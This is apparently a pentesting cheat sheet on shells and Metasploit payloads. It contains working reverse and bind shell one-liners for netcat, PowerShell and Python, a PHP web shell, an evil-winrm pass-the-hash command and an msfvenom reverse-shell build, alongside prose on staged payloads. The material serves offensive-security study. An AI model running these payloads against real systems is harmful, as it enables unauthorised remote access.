Shells and Command Execution

Netcat

The most basic netcat commands are nc -lvnp [port] for to open a listener and nc [ip] [port] to connect to a port. A process can also be attached to the latter via the -e option : nc [ip] [port] -e /bin/bash is the standard way to make a bind shell.

It is also possible to use a more convoluted command using pipes to bypass the fact that the -e option is not always available on some versions of netcat : mkfifo /tmp/f; nc -lvnp <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f to create our bind shell listener, and mkfifo /tmp/f; nc <LOCAL-IP> <PORT> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f to create a reverse shell

Powershell One-Liner

powershell.exe -c "$client = New-Object System.Net.Sockets.TCPClient('IP',PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Python one-liner

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Evil-winrm

evil-winrm -u [username] -p [password] -i [target ip]
evil-winrm -u [username] -H [hash] -i [target ip]

WebShells

Web shells are the results of scripts uploaded on the server side of a web application, and that give us limited execution capabilities (with our commands being passed as arguments in the queried uri).

<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>

Using the above example, we could query stuff like http://[target_ip]/uploads/shell.php?cmd=whoami

Msfvenom

msfvenom is a command-line tool in the Metasploit Framework that is used to generate various types of payloads, including shellcode, backdoors, and trojans. These payloads can be used to exploit vulnerabilities in systems and create a remote access channel to the target system. Its most basic syntax boils down to :

msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>

Staged payloads

In the context of a remote exploitation framework like Metasploit, a staged payload is delivered in multiple stages, where the initial stage is a small and often innocuous piece of code that establishes a covert communication channel with the attacker's system, and then downloads and executes the second stage, which contains the actual malicious payload.

The advantage of using staged payloads is that they can bypass certain security mechanisms that inspect the size or content of incoming network traffic, as the initial stage is often small and benign. Additionally, staged payloads can be smaller in size and more flexible in terms of their deployment options.

However, staged payloads also require a reliable and covert communication channel between the attacker and the target system, which can be more difficult to establish and maintain. In contrast, stageless payloads are self-contained and can be simpler to use and more reliable, but they may be more easily detectable by security mechanisms due to their larger size or more obvious functionality.

Stageless payloads

A stageless payload is a complete and standalone piece of code that can be executed directly on the target system without requiring any further communication or code execution steps. It is a single payload that contains all the necessary code to achieve the desired exploitation or post-exploitation objectives.

Stageless payloads are self-contained and can be simpler to use and more reliable, but they may be more easily detectable by security mechanisms due to their larger size or more obvious functionality.

Syntax

The Metasploit Framework uses a standardized naming convention for payloads to help users identify the type and features of each payload. The naming convention consists of four parts separated by slashes, as follows:

<Platform>/<Arch>/<Payload>

Here's what each part means:

• <Platform>: This indicates the target operating system or platform, such as windows, linux, solaris, bsd, java, php, etc.

• <Arch>: This indicates the target CPU architecture, such as x86, x64, ppc, sparc, arm, mips, etc.

• <Payload>: This indicates the type of payload, such as meterpreter, shell, reverse_tcp, reverse_http, reverse_https, bind_tcp, bind_http, bind_https, find_tag, vncinject, web_delivery, etc.

When it comes to payload, the presence of underscores implies a stageless payload. As an example, shell_reverse_tcp would be stageless, and shell/reverse_tcp would be staged.

Multihandler

The Metasploit Multi-handler is a built-in module in the Metasploit Framework that is used to handle incoming connections from exploited systems. It is commonly used in post-exploitation scenarios where an attacker has gained remote access to a target system using a payload or exploit, usually a Meterpreter shell.